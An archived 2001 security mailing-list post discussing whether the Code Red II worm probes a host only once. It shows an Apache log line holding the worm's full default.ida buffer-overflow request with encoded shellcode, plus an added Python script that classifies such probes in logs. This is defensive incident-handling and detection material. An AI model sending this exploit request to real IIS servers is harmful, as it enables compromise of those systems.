> NOW: CodeRedII (this name is easily mistaken with CRv2, so I would suppose
> another name: I started calling it ida_root since my first analysis on 5th
> Aug, 7:34 GMT)
> this worm always only infects one host _once_. It checks for double infection.
> It could generate the same IP address again in its PRNG, but the chance of
> this happening is near 0.

You would think it should be near 0, but unless I'm mistaken this should be CR II, correct?

x.x.x.x - - [06/Aug/2001:09:18:20 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
x.x.x.x - - [06/Aug/2001:09:18:23 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:18:37 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:18:37 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:23:13 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:23:44 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:23:44 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:23:53 -0500] <snip>
x.x.x.x - - [06/Aug/2001:09:23:57 -0500] <snip>

All from the same IP address out of my Apache logs.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
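An added Python example, not from this post or the list: it parses Apache common-log lines, labels default.ida probes by their padding letter (N for the original Code Red v1/v2, X for Code Red II), and counts probes per source so a repeat prober like the one in the log above stands out. The sample log lines and their TEST-NET addresses are constructed, with the padding shortened.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)
# A Code Red family probe is GET /default.ida?<padding>%u...; the padding
# letter separates the variants: 'N' for Code Red v1/v2, 'X' for Code Red II.
IDA_RE = re.compile(r'^GET /default\.ida\?(?P<pad>[A-Z]+)%u')

def classify(request):
    """Return a variant label for a default.ida probe, or None for other requests."""
    m = IDA_RE.match(request)
    if not m:
        return None
    pad = set(m.group('pad'))
    if pad == {'X'}:
        return 'CodeRedII'
    if pad == {'N'}:
        return 'CodeRed'
    return 'unknown-ida'

def scan(lines):
    """Parse log lines; return ({host: Counter(variant)}, sorted repeat hosts)."""
    per_host = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        label = classify(m.group('request'))
        if label is None:
            continue
        per_host.setdefault(m.group('host'), Counter())[label] += 1
    # Code Red II is said to probe a given target only once, so a source that
    # hits the same server repeatedly is worth a closer look.
    repeat_hosts = sorted(h for h, c in per_host.items() if sum(c.values()) > 1)
    return per_host, repeat_hosts

# Constructed sample lines (TEST-NET addresses, padding shortened) for offline use.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2001:09:18:20 -0500] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090=a HTTP/1.0" 404 278',
    '192.0.2.10 - - [06/Aug/2001:09:18:23 -0500] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090=a HTTP/1.0" 404 278',
    '192.0.2.10 - - [06/Aug/2001:09:23:13 -0500] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090=a HTTP/1.0" 404 278',
    '198.51.100.7 - - [06/Aug/2001:09:20:01 -0500] "GET /default.ida?NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090=a HTTP/1.0" 404 278',
    '203.0.113.5 - - [06/Aug/2001:09:21:40 -0500] "GET /index.html HTTP/1.0" 200 1043',
]
```

Run `scan(SAMPLE_LOG)` (or feed it `open('access_log')`) to get per-source variant counts and the list of sources that probed more than once.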
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 13:07:13 PDT